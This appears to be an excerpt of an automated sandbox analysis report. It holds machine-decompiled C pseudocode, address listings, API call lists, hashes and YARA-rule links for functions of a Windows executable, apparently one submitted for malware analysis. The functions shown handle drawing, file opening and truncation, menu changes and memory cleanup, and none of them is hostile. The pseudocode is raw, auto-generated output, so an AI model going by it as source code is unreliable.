							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041E68C(0x80000014));
							E00412984( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414000(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00413FA4( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412984( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00433FDC(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00436848(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                                0x00439bc4
                                                                                0x00439bc7
                                                                                0x00439bc9
                                                                                0x00439bcb
                                                                                0x00439bd4
                                                                                0x00439bf2
                                                                                0x00439bf2
                                                                                0x00439bf5
                                                                                0x00439bfd
                                                                                0x00439ce2
                                                                                0x00439ce2
                                                                                0x00439cea
                                                                                0x00439def
                                                                                0x00439def
                                                                                0x00439def
                                                                                0x00439cf3
                                                                                0x00439cf6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439cfd
                                                                                0x00439d01
                                                                                0x00439d03
                                                                                0x00439d0b
                                                                                0x00439d10
                                                                                0x00439d19
                                                                                0x00439d53
                                                                                0x00439d76
                                                                                0x00439d81
                                                                                0x00439d8b
                                                                                0x00439da0
                                                                                0x00439dc3
                                                                                0x00439dce
                                                                                0x00439dd8
                                                                                0x00439dd8
                                                                                0x00439ddd
                                                                                0x00439dde
                                                                                0x00439dde
                                                                                0x00439dde
                                                                                0x00000000
                                                                                0x00439d03
                                                                                0x00439c03
                                                                                0x00439c07
                                                                                0x00439c10
                                                                                0x00439c14
                                                                                0x00439c16
                                                                                0x00439c16
                                                                                0x00439c14
                                                                                0x00439c21
                                                                                0x00439c27
                                                                                0x00439c2d
                                                                                0x00439c3a
                                                                                0x00439c40
                                                                                0x00439c6e
                                                                                0x00439c80
                                                                                0x00439c86
                                                                                0x00439c88
                                                                                0x00439c88
                                                                                0x00439c94
                                                                                0x00439ca0
                                                                                0x00439cb2
                                                                                0x00439cc2
                                                                                0x00439ccd
                                                                                0x00439cd2
                                                                                0x00439cd2
                                                                                0x00439c80
                                                                                0x00439cd8
                                                                                0x00439cd9
                                                                                0x00439c2d

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction ID: ceb3e369153146217064650c0b56690f9fbafe8079a4cddf4b1ed266614cb7ac
                                                                                • Opcode Fuzzy Hash: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction Fuzzy Hash: F4517F712042449FDB18EF29C8C4B9B77E8AF49308F04545EFD89CB296D678EC45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402B18, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E00402B18(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AAC;
				}
				_t59[9] = E00402AF8;
				_t59[8] = E00402AA8;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AA8;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4873e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AAC;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                0x00402b19
                                                                                0x00402b1d
                                                                                0x00402b20
                                                                                0x00402b2c
                                                                                0x00402b39
                                                                                0x00402b3e
                                                                                0x00402b43
                                                                                0x00402b48
                                                                                0x00402b2e
                                                                                0x00402b2f
                                                                                0x00402b51
                                                                                0x00402b56
                                                                                0x00402b5b
                                                                                0x00402b31
                                                                                0x00402b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b62
                                                                                0x00402b67
                                                                                0x00402b6c
                                                                                0x00402b6c
                                                                                0x00402b71
                                                                                0x00402b71
                                                                                0x00402b78
                                                                                0x00402b7f
                                                                                0x00402b8a
                                                                                0x00402c48
                                                                                0x00402c4f
                                                                                0x00402c56
                                                                                0x00402c5f
                                                                                0x00402c6b
                                                                                0x00402c71
                                                                                0x00402c6d
                                                                                0x00402c6d
                                                                                0x00402c6d
                                                                                0x00402c61
                                                                                0x00402c61
                                                                                0x00402c61
                                                                                0x00402c73
                                                                                0x00402c7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c7d
                                                                                0x00000000
                                                                                0x00402b90
                                                                                0x00402ba0
                                                                                0x00402ba8
                                                                                0x00402cb6
                                                                                0x00402cb6
                                                                                0x00000000
                                                                                0x00402cbc
                                                                                0x00402bae
                                                                                0x00402bb6
                                                                                0x00402c7f
                                                                                0x00402c85
                                                                                0x00402c9e
                                                                                0x00000000
                                                                                0x00402c9e
                                                                                0x00402c89
                                                                                0x00402c90
                                                                                0x00402ca4
                                                                                0x00402ca9
                                                                                0x00000000
                                                                                0x00402caf
                                                                                0x00402c95
                                                                                0x00402c97
                                                                                0x00402c97
                                                                                0x00000000
                                                                                0x00402c95
                                                                                0x00402bbc
                                                                                0x00402bc9
                                                                                0x00402bca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402bd0
                                                                                0x00402bd5
                                                                                0x00402bd7
                                                                                0x00402bd7
                                                                                0x00402be6
                                                                                0x00000000
                                                                                0x00402bec
                                                                                0x00402c01
                                                                                0x00402c06
                                                                                0x00402c08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c0e
                                                                                0x00402c10
                                                                                0x00402c1c
                                                                                0x00402c30
                                                                                0x00000000
                                                                                0x00402c40
                                                                                0x00000000
                                                                                0x00402c40
                                                                                0x00402c30
                                                                                0x00402c1e
                                                                                0x00402c1e
                                                                                0x00000000
                                                                                0x00402c10
                                                                                0x00402be6

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00402C73
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00402C89
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00402CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction ID: c7a4ebb683dc642720d6c14f3ce292b160b37a6f3a2b11c4ffb55bc8aa658509
                                                                                • Opcode Fuzzy Hash: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction Fuzzy Hash: 1D41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841974D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00450F98, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00450F98(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043BD14( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                                0x00450f9f
                                                                                0x00450fa9
                                                                                0x00450fb2
                                                                                0x00450fbc
                                                                                0x00450fc5
                                                                                0x00450fcf
                                                                                0x00450fe8
                                                                                0x00450ff7
                                                                                0x00451001
                                                                                0x0045100e
                                                                                0x0045101b
                                                                                0x00451028
                                                                                0x00451035
                                                                                0x00451042
                                                                                0x00000000
                                                                                0x0045104f
                                                                                0x00451063
                                                                                0x0045106d
                                                                                0x0045106d
                                                                                0x00451075
                                                                                0x0045107f
                                                                                0x00000000
                                                                                0x00451089
                                                                                0x0045107f
                                                                                0x00450fcf
                                                                                0x00450fbc
                                                                                0x00451090

                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00450FE3
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451001
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045100E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045101B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451028
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451035
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451042
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045104F
                                                                                • EnableMenuItem.USER32 ref: 0045106D
                                                                                • EnableMenuItem.USER32 ref: 00451089
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction ID: 0d157b5141c4730fac339518274e379f240c5fea68c2b1bb01df9476f5004e56
                                                                                • Opcode Fuzzy Hash: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction Fuzzy Hash: 49218B703803447AF730AA24DC8EF697BD85F04B19F0180A5BA457F2E3C6B8E9D0964C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B3C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00401B3C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4875bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x487049 != 0) {
						_push(0x4875c4);
						L004013D4();
					}
					 *0x4875bc = 0;
					_t3 =  *0x48761c; // 0x7528d0
					LocalFree(_t3);
					 *0x48761c = 0;
					_t19 =  *0x4875e4; // 0x753f04
					while(_t19 != 0x4875e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040143C(0x4875e4);
					E0040143C(0x4875f4);
					E0040143C(0x487620);
					_t14 =  *0x4875dc; // 0x7538d0
					while(_t14 != 0) {
						 *0x4875dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4875dc; // 0x7538d0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c19);
					if( *0x487049 != 0) {
						_push(0x4875c4);
						L004013DC();
					}
					_push(0x4875c4);
					L004013E4();
					return 0;
				}
			}










                                                                                0x00401b3d
                                                                                0x00401b47
                                                                                0x00401c1b
                                                                                0x00401b4d
                                                                                0x00401b4f
                                                                                0x00401b50
                                                                                0x00401b55
                                                                                0x00401b58
                                                                                0x00401b62
                                                                                0x00401b64
                                                                                0x00401b69
                                                                                0x00401b69
                                                                                0x00401b6e
                                                                                0x00401b75
                                                                                0x00401b7b
                                                                                0x00401b82
                                                                                0x00401b87
                                                                                0x00401ba1
                                                                                0x00401b9a
                                                                                0x00401b9f
                                                                                0x00401b9f
                                                                                0x00401bae
                                                                                0x00401bb8
                                                                                0x00401bc2
                                                                                0x00401bc7
                                                                                0x00401bce
                                                                                0x00401bd2
                                                                                0x00401bd9
                                                                                0x00401bde
                                                                                0x00401be3
                                                                                0x00401be9
                                                                                0x00401bec
                                                                                0x00401bef
                                                                                0x00401bfb
                                                                                0x00401bfd
                                                                                0x00401c02
                                                                                0x00401c02
                                                                                0x00401c07
                                                                                0x00401c0c
                                                                                0x00401c11
                                                                                0x00401c11

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,1!), ref: 00401B69
                                                                                • LocalFree.KERNEL32(007528D0,00000000,1!), ref: 00401B7B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,007528D0,00000000,1!), ref: 00401B9A
                                                                                • LocalFree.KERNEL32(007538D0,?,00000000,00008000,007528D0,00000000,1!), ref: 00401BD9
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401C19,007528D0,00000000,1!), ref: 00401C02
                                                                                • RtlDeleteCriticalSection.KERNEL32(004875C4,00401C19,007528D0,00000000,1!), ref: 00401C0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: 1!$>u
                                                                                • API String ID: 3782394904-3870673495
                                                                                • Opcode ID: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction ID: caa9c97ba3000af0647512c36d6f90ab019626e33afd24c9466f0402b3c2e7e1
                                                                                • Opcode Fuzzy Hash: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction Fuzzy Hash: DF115E7464C6406EE711BB66ECB2B2E7A959745708F60887FF500B6AF2D67CD840CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409FFC, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50filewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409FFC(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409E74(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x486cc4; // 0x487048
				if( *_t12 == 0) {
					_t14 =  *0x486aa8; // 0x4074e4
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x487714; // 0x400000
					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x486af0; // 0x487218
				E00402D0C(_t22);
				_t26 = E00408B40( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0ac, 2,  &_v1092, 0);
			}













                                                                                0x0040a00b
                                                                                0x0040a010
                                                                                0x0040a018
                                                                                0x0040a06b
                                                                                0x0040a070
                                                                                0x0040a074
                                                                                0x0040a07f
                                                                                0x00000000
                                                                                0x0040a095
                                                                                0x0040a01a
                                                                                0x0040a01f
                                                                                0x0040a02f
                                                                                0x0040a042
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00409E74: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                  • Part of subcall function 00409E74: LoadStringA.USER32 ref: 00409F66
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A03C
                                                                                • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A042
                                                                                • GetStdHandle.KERNEL32(000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A057
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A05D
                                                                                • LoadStringA.USER32 ref: 0040A07F
                                                                                • MessageBoxA.USER32 ref: 0040A095
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                                • String ID: HpH$t@
                                                                                • API String ID: 1802973324-3679897340
                                                                                • Opcode ID: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction ID: 7d280b318de20257b267b25c9c6113f965e65ab47ef070ee4e671aee89c3a216
                                                                                • Opcode Fuzzy Hash: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction Fuzzy Hash: 7501A1B2244305BAD700FB64CC42F9B77ACAB05704F408A3E7355F60E2DA78E9008B2B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004352BC, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004352BC(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x435468; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x435460; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x435468; // 0x0
				if(_t113 != (_t107 &  *0x435464)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x435468; // 0x0
				if(_t114 != (_t107 &  *0x43546c)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041EDEC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041EDD0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                                0x004352c3
                                                                                0x004352c6
                                                                                0x004352c8
                                                                                0x004352cd
                                                                                0x0043544a
                                                                                0x0043544a
                                                                                0x0043544f
                                                                                0x0043545c
                                                                                0x0043545c
                                                                                0x004352d7
                                                                                0x004352e1
                                                                                0x004352d9
                                                                                0x004352d9
                                                                                0x004352d9
                                                                                0x004352ea
                                                                                0x004352fe
                                                                                0x004352ec
